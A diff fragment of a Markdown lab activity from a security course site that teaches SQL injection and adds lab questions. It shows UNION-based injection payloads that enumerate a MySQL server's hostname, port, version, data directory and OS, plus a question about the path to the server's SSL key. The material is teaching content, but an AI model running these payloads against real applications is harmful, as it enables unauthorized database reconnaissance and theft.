security-assignments/security-assignments.github.io/_activities/activity_sqli.md

 `' union select null, @@hostname#`

+{% include lab_question.html question='What kind of variable is `@@hostname`?' %}

+{% include lab_question.html question='What's the full path to the SQL server's SSL key?' %}

 ### Show port

 `' union select null, @@port#`

 ### Concatenate more host information fields

+We can concatenate 0x0a (line feed) with selected information to better display it.

 `' union select null, concat(@@version, 0x0a, @@hostname, 0x0a, @@datadir, 0x0a, @@version_compile_os) #`